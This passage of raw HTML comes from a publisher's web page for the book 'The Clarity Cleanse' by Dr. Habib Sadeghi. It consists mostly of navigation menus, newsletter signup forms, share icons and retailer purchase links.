</span></span><ul id="site-header__sub-menu-977872798" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-977872798"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/author-inquiry/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Author Inquiry">Author Inquiry</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/book-trailers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Trailers">Book Trailers</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/meet-the-author-video/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet the Author">Meet the Author</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/wordsmithing/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Wordsmithing">Wordsmithing</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/bold-recommendations/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Bold Recommendations">Bold Recommendations</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/book-your-next-romance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Your Next Romance">Book Your Next Romance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/shelf-life/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Shelf Life">Shelf Life</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="/landing-page/hbg-films/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Films">HBG Films</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/recommendations-from-the-african-diaspora/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Recommendations from the African Diaspora">Recommendations from the African Diaspora</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/blogs-hub" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Blogs">Blogs</a><span id="expand-site-header__sub-menu-1875572481" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1875572481" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1875572481" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3802782435  desc-arrow-4081778774">
	<title id="titlet-arrow-3802782435">Arrow Icon</title>
	<desc id="desc-arrow-4081778774">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1875572481" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1875572481"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.novelsuspects.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Novel Suspects">Novel Suspects</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/the-current/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="The Current">The Current</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/open-book/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Open Book">Open Book</a></span></li></ul>
</li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About">About</a><span id="expand-site-header__sub-menu-876808432" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-876808432" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-876808432" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3078339719  desc-arrow-2408658420">
	<title id="titlet-arrow-3078339719">Arrow Icon</title>
	<desc id="desc-arrow-2408658420">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-876808432" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-876808432"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/landing-page/about-hachette-book-group-2/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="About Hachette Book Group">About Hachette Book Group</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/about/careers/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Careers">Careers</a></span></li></ul>
</li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.hachettebookgroup.com/">
		<label class="site-search__label" for="search-form-6268153ea7651">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input add-autocomplete" type="search" id="search-form-6268153ea7651" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-439227426  desc-search-icon-2744742268">
	<title id="title-search-icon-439227426">Search</title>
	<desc id="desc-search-icon-2744742268">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup site-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Get recommended reads, deals, and more from Hachette</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Get recommended reads, deals, and more from Hachette</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>
<div class="modal-popup site-popup mailchimp-options modal fade" id="mailchimp_options_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
	<button type="button" class="modal-close mailchimp-modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
	<form>
		<div id="mc_embed_signup_scroll">
			<div class="mc-field-group">
				<input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL">
			</div>
			<h2 class="mailchimp-options__header">Thanks for signing up!</h2>
			<p class="mailchimp-options__header-small">Now, tell us what you like to read.</p>
			<div class="input-group-container">

				<div class="mc-field-group input-group">
					<h3 class="mailchimp-options__sub-header">Newsletters</h3>
					<ul class="mailchimp-options__interest-groups">
						<li><input type="checkbox" value="7860e51d31" name="Christian"><label>Christian (Faithwords)</label></li>
						<li><input type="checkbox" value="1b0133104b" name="Romance"><label>Romance (Forever)</label></li>
						<li><input type="checkbox" value="685d0c532e" name="Mystery"><label>Mystery &amp; Thriller (Novel Suspects)</label></li>
						<li><input type="checkbox" value="1b749b6db0" name="Young"><label>Young Adult (Novl)</label></li>
						<li><input type="checkbox" value="3a28b93c6f" name="Science"><label>Science Fiction (Orbit)</label></li>
						<li><input type="checkbox" value="d0ca99f338" name="Travel"><label>Travel (Moon)</label></li>
						<li><input type="checkbox" value="e36ec4213a" name="Deals"><label>Deals</label></li>
						<li><input type="checkbox" value="f517c289cf" name="Childrens Books"><label>Children&#039;s Books (Family Reads)</label></li>
						<li><input type="checkbox" value="6824b13175" name="Virtual Author Events"><label>Virtual Author Events</label></li>
						<li><input type="checkbox" value="27b332daad" name="LB School & Library"><label>Little, Brown School &amp; Library</label></li>
						<li><input type="checkbox" value="be306ee257" name="Author Spotlights"><label>Author Spotlights</label></li>
					</ul>
				</div>
				<div class="mc-field-group input-group">
					<h3 class="mailchimp-options__sub-header">Genre Preferences</h3>
					<ul class="mailchimp-options__interest-groups">
						<li><input type="checkbox" value="472b302a2d" name="Audiobooks"><label>Audiobooks</label></li>
						<li><input type="checkbox" value="4a44336e04" name="Biography"><label>Biography &amp; Memoir</label></li>
						<li><input type="checkbox" value="5b40865621" name="Book"><label>Book Clubs</label></li>
						<li><input type="checkbox" value="00af569508" name="Business"><label>Business</label></li>
						<li><input type="checkbox" value="7312408386" name="Cooking"><label>Cooking</label></li>
						<li><input type="checkbox" value="4910abfa81" name="Politics"><label>Politics</label></li>
						<li><input type="checkbox" value="dc1faf273d" name="Fiction"><label>Fiction</label></li>
						<li><input type="checkbox" value="9e88d9c708" name="Health"><label>Health &amp; Wellness</label></li>
						<li><input type="checkbox" value="6b7c878b27" name="History"><label>History</label></li>
						<li><input type="checkbox" value="60ca58a11e" name="Entertainment"><label>Entertainment</label></li>
					</ul>
				</div>
			</div>
			<div id="mce-responses" class="clear">
				<div class="response" id="mce-error-response" style="display:none"></div>
				<div class="response" id="mce-success-response" style="display:none"></div>
			</div>
			<div class="clear mailchimp-options__submit-button">
				<input type="submit" value="Submit" name="subscribe" id="mc-embedded-subscribe" class="button">
			</div>
			<p class="mailchimp-options__response-text"></p>
			<button type="button" class="mailchimp-modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		</div>
	</form>
</div>
			<div id="content" class="site__content">
				
<header class="title-header module v2" itemscope itemtype="http://schema.org/Book">
	<meta itemprop="url" content="https://www.hachettebookgroup.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781455542222/" />
	<div class="module__content module--fixed grand-central-publishing">
		<div class="title-header__social-container">
			<ul class="site__share title-header__share">
				<li class="site__share-prompt">Share</li>
				<li class="share-facebook">
					<a href="//www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F" target="_blank">
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-4042875307  desc-facebook-icon-2330800231">
	<title id="title-facebook-icon-4042875307">Facebook Icon</title>
	<desc id="desc-facebook-icon-2330800231">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
				<li class="share-twitter">
					<a href="//twitter.com/intent/tweet?url=https%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F&#038;text=The%20Clarity%20Cleanse" target="_blank">
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-3540682345  desc-twitter-icon-3431734009">
	<title id="title-twitter-icon-3540682345">Twitter Icon</title>
	<desc id="desc-twitter-icon-3431734009">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
				<li class="share-email">
					<a href="mailto:friend@example.com?subject=Check%20this%20out.&#038;body=The%20Clarity%20Cleanse%0D%0A%0D%0A%0D%0A%0D%0Ahttps%3A%2F%2Fwww.hachettebookgroup.com%2Ftitles%2Fdr-habib-sadeghi%2Fthe-clarity-cleanse%2F9781455542222%2F">
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-email-icon-1007608762  desc-email-icon-1219873696">
	<title id="title-email-icon-1007608762">Email Icon</title>
	<desc id="desc-email-icon-1219873696">Envelope</desc>
	<path role="presentation" class="cls-1" d="M8.38,12.53a.64.64,0,0,0,0,.09V26.1l6.29-7.48Z" transform="translate(0 0)"/>
	<polygon role="presentation" class="cls-1" points="29.58 11.97 9.17 11.97 19.37 19.94 29.58 11.97"/>
	<polygon role="presentation" class="cls-1" points="19.37 23.18 16.46 20.36 9.07 26.83 29.68 26.83 22.29 20.36 19.37 23.18"/>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0ZM31.83,26.72a1.57,1.57,0,0,1-.36,1,.55.55,0,0,1-.21.21,1.44,1.44,0,0,1-1,.36H8.45a1.5,1.5,0,0,1-1-.37.58.58,0,0,1-.2-.21,1.5,1.5,0,0,1-.35-1V12a1.59,1.59,0,0,1,.36-1,.74.74,0,0,1,.29-.27,1.39,1.39,0,0,1,.89-.31H30.29a1.5,1.5,0,0,1,.7.18l0-.05.66.63-.06,0a1.58,1.58,0,0,1,.21.78Z" transform="translate(0 0)"/>
	<path role="presentation" class="cls-1" d="M24.08,18.62l6.29,7.48V12.62a.64.64,0,0,0,0-.09Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
			</ul>
		</div>

		<div class="title-header__image new-title--image">
			<img width="450" height="675" src="" class="lazyload orientation-portrait" alt="The Clarity Cleanse" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/12/9781455542222.jpg?fit=450%2C675" />
			<div class="title-header__dropdown dropdown title-header__read-excerpt read-excerpt">
	<a href="#module-whats-inside" class="btn btn-default new-title--button">
		Read Excerpt		<span class="download-arrow eye-icon">
<svg version="1.1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve" role="img" aria-labelledby="title-glasses-icon969598333  desc-glasses-icon-1643964392">
	<title id="title-glasses-icon969598333">Glasses Icon</title>
	<desc id="desc-glasses-icon-1643964392">Icon of eye glasses over an open book</desc>
<g>
	<path role="presentation" d="M452,182H316c-24.5,0-46.3,11.8-60,30.1c-13.7-18.2-35.5-30.1-60-30.1H60v30H0v300h512V212h-60V182z M60,482H30V242h30
		C60,245.4,60,477.1,60,482z M90,482v-30h106c19.6,0,36.2,12.5,42.4,30H90z M241,437c-12.5-9.4-28.1-15-45-15H90V212h106
		c24.8,0,45,20.2,45,45V437z M422,482H273.6c6.2-17.5,22.9-30,42.4-30h106V482z M422,422H316c-16.9,0-32.5,5.6-45,15V257
		c0-24.8,20.2-45,45-45h106V422z M482,242v240h-30c0-23.7,0-207.1,0-240H482z"/>
	<path role="presentation" d="M166,152c36.9,0,66.7-27.1,73.5-61h33c6.8,33.9,36.7,61,73.5,61c36.9,0,66.7-27.1,73.5-61H451V61h-31.5
		C412.7,27.1,382.9,0,346,0c-36.9,0-66.7,27.1-73.5,61h-33C232.7,27.1,202.9,0,166,0c-36.9,0-66.7,27.1-73.5,61H61v30h31.5
		C99.3,124.9,129.1,152,166,152z M346,30c24.4,0,45,21.1,45,46s-20.6,46-45,46s-45-21.1-45-46S321.6,30,346,30z M166,30
		c24.4,0,45,21.1,45,46s-20.6,46-45,46s-45-21.1-45-46S141.6,30,166,30z"/>
	<rect role="presentation" x="120" y="242" width="91" height="30"/>
	<rect role="presentation" x="120" y="302" width="91" height="30"/>
	<rect role="presentation" x="120" y="362" width="91" height="30"/>
	<rect role="presentation" x="301" y="242" width="91" height="30"/>
	<rect role="presentation" x="301" y="302" width="91" height="30"/>
	<rect role="presentation" x="301" y="362" width="91" height="30"/>
</g>
</svg>
</span>
	</a>
</div>
<div
	id="exam-copy"
	class="exam-copy title-header__dropdown dropdown title-header__exam-copy"
	data-isbn="9781455542222"
>
	<div class="btn btn-default zb-btn">
		<a id="exam-copy-link" href="" target="_blank">
			<p>Request Desk/Exam Copy				<span class="download-arrow eye-icon">
<svg enable-background="new 0 0 511.969 511.969" height="512" viewBox="0 0 511.969 511.969" width="512" xmlns="http://www.w3.org/2000/svg" role="img" aria-labelledby="title-academic-icon3540197725  desc-academic-icon-3119611648">
	<title id="title-academic-icon3540197725">Academic Icon</title>
	<desc id="desc-academic-icon-3119611648">Academic icon</desc>
	<path d="m497.665 440.493c-12.779-63.897-66.272-108.524-130.085-108.524h-46.502c-7.883 0-14.702-4.568-18.001-11.185 34.298-17.297 57.88-52.851 57.88-93.815 0-28.793 0-108.026 0-136.84l30-9v99.84h30v-108.839l37.042-11.113-202.043-61.017-202.042 61.017 97.042 29.113v136.84c0 40.963 23.582 76.518 57.88 93.815-3.299 6.618-10.118 11.185-18.001 11.185h-46.502c-63.779 0-117.249 44.627-130.028 108.524l-14.296 71.475h511.951zm-241.709-409.155 97.958 29.583-97.958 29.387-97.958-29.387zm0 90.292 75-22.5v51.84h-150v-51.84zm-75 105.339v-46h150v46c0 41.355-33.645 75-75 75s-75-33.645-75-75zm56.454 103.36c6.022 1.078 12.219 1.64 18.546 1.64s12.525-.563 18.546-1.64c7.373 18.514 25.464 31.64 46.575 31.64h23.67l-88.791 110.988-88.791-110.988h23.67c21.111 0 39.202-13.126 46.575-31.64zm-193.689 116.048c8.931-44.656 43.246-77.192 85.881-83.339l95.145 118.931h-188.144zm243.444 35.592 95.146-118.932c42.666 6.143 77.004 38.681 85.936 83.34l7.118 35.592z"/></svg>
</span>
			</p>
		</a>
	</div>
</div>
		</div>

		<div class="title-header__content">
			<div class="title-header__primary-info--container">
				<div class="title-header__primary-info">
											<h1 itemprop="name">
							The Clarity Cleanse						</h1>
												<p class="title-header__subtitle">
							12 Steps to Finding Renewed Energy, Spiritual Fulfillment, and Emotional Healing						</p>
																			<div class="title-header__bylines">
								<p class="title-header__byline">
									by <a href="https://www.hachettebookgroup.com/contributor/dr-habib-sadeghi/" class="title-header__author"><span>Dr. Habib Sadeghi</span></a>								</p>
							</div>
													<div class="title-header__bylines">
								<p class="title-header__byline">
									Foreword by <a href="https://www.hachettebookgroup.com/contributor/gwyneth-paltrow/" class="title-header__author"><span>Gwyneth Paltrow</span></a>								</p>
							</div>
												
					<div class="title-header__award">
											</div>
				</div>
				<div class="title-header__imprint grand-central-publishing">
												<a href="https://www.grandcentralpublishing.com/">
								<svg id="Layer_1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 220.1 136"><style>.grandcentral-st0{fill:#ef4529}</style><title>Grand Central Publishing Logo</title><path class="grandcentral-st0" d="M98.1 4.7c-8.5.4-17.4 2.7-17.3 11.9 0 9.1 9.6 12.1 18.5 12 7.1-.1 15.2-1.9 16.7-5.8h-11.8v-6.2h29.1v5.8h-10.9v11.4h-6.2v-3.9c-4.8 2.6-8.2 4-18.4 4.1-11.6 0-24.2-6.1-24.1-17.7S86.9-.4 98.6-.4c7.4 0 11.5 1.1 17.5 3.8V0h5.9v12.6h-5.5c-2.1-5.4-10.6-8.2-18.4-7.9zm-.9 54.6c-8.3-.1-17.6 3.3-17.4 12.4.3 8.5 10.5 11.7 19 11.6 8.9-.2 15.6-2.1 17.8-9.4h5.2c-.2 10-11.3 15.1-23.1 15-12.1-.1-25.7-5.2-25.8-17.4-.2-11.7 12-17.5 24.4-17.3 8.2.1 10.7 1.1 17.8 4.5v-4.1h6.8v12.6h-6.4c-2.2-4.8-7.8-7.7-18.3-7.9zM65 41.1h57.2v5.8H65v-5.8zM0 108.7c0-4 3.2-7.3 7.2-7.3h.2c2-.1 4 .6 5.6 2l-2 2.4c-1-1-2.3-1.5-3.7-1.4-2.3.1-4.2 2.1-4.1 4.4-.1 2.3 1.6 4.3 4 4.5h.3c1 0 2.1-.3 2.9-.8v-2H7.3v-2.7h6.2v6c-1.7 1.5-3.8 2.2-6.1 2.2-3.9.2-7.2-2.8-7.4-6.8v-.5zm20-7.2h6.5c1.5-.1 3 .4 4.1 1.4.8.9 1.3 2 1.2 3.2.1 2-1.1 3.8-3 4.4l3.5 5.1h-3.6l-3-4.5h-2.4v4.6H20v-14.2zm6.2 6.9c1.5 0 2.4-.8 2.4-2 0-1.3-.9-2-2.4-2h-3.1v4.1l3.1-.1zm16.5-7h2.9l6.1 14.3h-3.3l-1.3-3.2h-6l-1.3 3.2h-3.2l6.1-14.3zm3.3 8.4l-1.9-4.6-1.9 4.6H46zm10.8-8.3h2.9l6.6 8.7v-8.7h3.1v14.2h-2.6l-6.9-9v9h-3.1v-14.2zm19.5 0h5.5c4.5 0 7.5 3 7.5 7s-3.1 7.1-7.5 7.1h-5.5v-14.1zm5.5 11.4c2.2.2 4.1-1.5 4.3-3.7v-.5c.1-2.2-1.6-4.2-3.9-4.3h-2.8v8.5h2.4zm20.3-4.6c-.1-4 3.1-7.3 7.1-7.3h.3c2.1-.1 4.1.7 5.6 2.2l-2 2.3c-.9-1-2.2-1.6-3.6-1.6-2.3.1-4.2 2-4.1 4.3v.1c-.1 2.3 1.7 4.3 4 4.4h.1c1.4 0 2.8-.6 3.7-1.7l2 2c-1.4 1.7-3.6 2.6-5.8 2.5-3.9.1-7.2-3.1-7.3-7v-.2zm18.6-7.2h10.7v2.8h-7.6v2.8h6.7v2.8h-6.7v3h7.7v2.8h-10.8v-14.2zm17.5 0h2.9l6.7 8.7v-8.7h3.1v14.2h-2.6l-6.9-9v9h-3.1l-.1-14.2zm22.5 2.8h-4.3V101h11.7v2.9h-4.3v11.3h-3.1v-11.3zm13.1-2.8h6.5c1.5-.1 3 .4 4.1 1.4.8.9 1.3 2 1.2 3.2.1 2-1.1 3.8-3 4.4l3.5 5.1h-3.6l-3-4.5H177v4.5h-3.1l-.1-14.1zm6.2 6.8c1.5 0 2.4-.8 2.4-2 0-1.3-.9-2-2.5-2h-3.1v4.1l3.2-.1zm16.4-6.8h2.9l6.1 14.3h-3.3l-1.3-3.2h-6l-1.3 3.2h-3.2l6.1-14.3zm3.3 8.3l-1.9-4.6-1.9 4.6h3.8zm10.2-8.3h3.1v11.3h7.1v2.8h-10.2v-14.1zM41.5 125.5h4.3c2.5 0 4 1.5 4 3.6 0 2.4-1.9 3.7-4.2 3.7h-1.7v3.1h-2.3v-10.4zm4.1 5.3c.9.1 1.7-.5 1.8-1.4v-.2c0-1-.7-1.6-1.9-1.6h-1.8v3.2h1.9zm8.2.7v-6h2.3v5.9c0 1.7.9 2.6 2.3 2.6s2.3-.8 2.3-2.5v-6H63v5.9c0 3.2-1.8 4.7-4.6 4.7s-4.6-1.5-4.6-4.6zm13.9-6h4.9c1-.1 2 .3 2.7.9.5.5.8 1.1.7 1.8 0 1-.5 1.9-1.4 2.3 1.2.3 2 1.4 2 2.6 0 1.9-1.6 2.9-3.9 2.9h-5v-10.5zm4.4 4.3c1 0 1.7-.3 1.7-1.1 0-.7-.5-1.1-1.5-1.1H70v2.2h2.1zm.6 4.2c1 0 1.6-.3 1.6-1.2 0-.7-.5-1.1-1.7-1.1H70v2.3h2.7zm8.4-8.5h2.3v8.4h5.3v2.1h-7.5l-.1-10.5zm12.2 0h2.3V136h-2.3v-10.5zm7 9.2l1.4-1.7c.8.8 2 1.3 3.1 1.3.9 0 1.5-.4 1.5-1s-.4-.9-2.1-1.3c-2.1-.5-3.5-1.1-3.5-3.2 0-1.9 1.5-3.2 3.7-3.2 1.4 0 2.8.5 3.9 1.3l-1.2 1.7c-.8-.6-1.7-.9-2.7-1-.9 0-1.3.4-1.3.9 0 .7.4.9 2.3 1.4 2.1.5 3.3 1.3 3.3 3.1 0 2.1-1.6 3.3-3.9 3.3-1.7.1-3.3-.5-4.5-1.6zm13.1-9.2h2.3v4.1h4.3v-4.2h2.3V136H120v-4.2h-4.3v4.2h-2.3v-10.5zm13.7 0h2.3V136h-2.3v-10.5zm7.7 0h2.1l4.9 6.5v-6.5h2.3V136h-2l-5.1-6.7v6.7h-2.3l.1-10.5zm13.5 5.5c0-3 2.4-5.4 5.3-5.4h.2c1.5-.1 3 .4 4.1 1.5l-1.4 1.7c-.7-.7-1.7-1.1-2.8-1-1.7.1-3.1 1.5-3 3.3-.1 1.7 1.2 3.2 3 3.3h.2c.8 0 1.5-.2 2.2-.6v-1.5h-2.3v-2h4.6v4.6c-1.2 1.1-2.8 1.7-4.5 1.7-2.9.2-5.4-2.1-5.5-5-.1-.4-.1-.5-.1-.6z"/></svg>
							</a>
							<meta itemprop="publisher" content="Grand Central Publishing" />
										</div>
			</div>

			<div class="title-header__formats-container">
				<p class="v2-button-cta">Buy Now:</p>
<div class="title-header__buy-links--container ">
			<a class="btn btn-default btn-default title-header__buy-links--button"
				target="_blank"
				href="http://www.amazon.com/gp/product/1455542229?tag=hacboogrosit-20"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Amazon"
			>Amazon		</a>
			<a class="btn btn-default btn-default title-header__buy-links--button"
				target="_blank"
				href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781455542222"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Barnes &amp; Noble"
			>Barnes &amp; Noble		</a>
			<a class="btn btn-default btn-default title-header__buy-links--button"
				target="_blank"
				href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781455542222"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Books-A-Million"
			>Books-A-Million		</a>
			<a class="btn btn-default btn-default title-header__buy-links--button"
				target="_blank"
				href="http://www.indiebound.org/book/9781455542222"
				data-type="link-event"
				data-category="Retailer Button"
				data-action="Click to Retail"
				data-label="Indiebound"
			>Indiebound		</a>
				<a
		class="expand-circle-button exapand-collapse-button toggleable hide-toggle "
		data-toggle="collapse"
		data-target=".retailers-collapse"
		data-text-original="See All"
		data-text-toggle="See Less">See All</a>
	</div>

	<div class="retailers-collapse title-header__buy-links--container" aria-expanded="false" style="height:0px;overflow:hidden;">
					<a class="btn btn-default btn-default title-header__buy-links--button"
					target="_blank"
					href="https://bookshop.org/a/2344/9781455542222"
					data-type="link-event"
					data-category="Retailer Button"
					data-action="Click to Retail"
					data-label="Bookshop"
				>
				Bookshop			</a>
					<a class="btn btn-default btn-default title-header__buy-links--button"
					target="_blank"
					href="https://www.hudsonbooksellers.com/book/9781455542222/aff/HBGUSA"
					data-type="link-event"
					data-category="Retailer Button"
					data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
				Hudson Booksellers			</a>
					<a class="btn btn-default btn-default title-header__buy-links--button"
					target="_blank"
					href="http://www.powells.com/book/-9781455542222"
					data-type="link-event"
					data-category="Retailer Button"
					data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
				Powell&#039;s			</a>
